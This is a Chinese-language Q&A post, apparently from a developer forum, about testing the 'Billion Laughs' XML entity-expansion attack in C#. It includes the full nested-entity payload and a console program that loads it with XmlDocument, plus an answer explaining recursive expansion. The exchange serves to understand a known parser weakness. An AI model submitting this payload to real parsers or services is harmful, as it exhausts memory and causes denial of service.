我正在尝试从MSDN magazine page测试XML代码,它说下面的代码行会在处理时导致内存使用量增加到3GB。
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
当我尝试将该文本粘贴到Visual Studio中的xml文件中时,确实显示内存和CPU使用率都有所增加。但是,当我尝试将其放在文本文件中而不是XML文件并使用c#加载它时,它没有任何影响。
更新:我认为LoadXml方法应该有影响,但我想这不是处理部分。当我试图得到第一个孩子时(即c#)抛出一个异常,告诉我MaxCharactersFromEntities被超过。
更新:这里也是我的代码:
using System;
using System.Xml;
namespace BillionLaughsAttack
{
class Program
{
//The file containing the billion laughs mentioned previously
//a txt file: Since an xml file causes visual studio to parse
static String xmlFileLocation = "./MyData/DeepXML.txt";
static void Main(string[] args)
{
String xmlContent = null;
System.IO.StreamReader sr;
System.Xml.XmlDocument document = new XmlDocument();
try
{
sr = new System.IO.StreamReader(xmlFileLocation);
xmlContent = sr.ReadToEnd();
//Load xml containing Billion Laughs Attack (this won't do anything!)
document.LoadXml(xmlContent);
//Proces xml by getting first child (this will cause an exception!)
String val = document.FirstChild.Value;
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
}
}
答案 0 :(得分:8)
此攻击利用易受攻击的 XML 功能。
通过XML解析器运行它将递归扩展实体并占用大量内存 将其作为纯文本阅读根本不会做任何事情。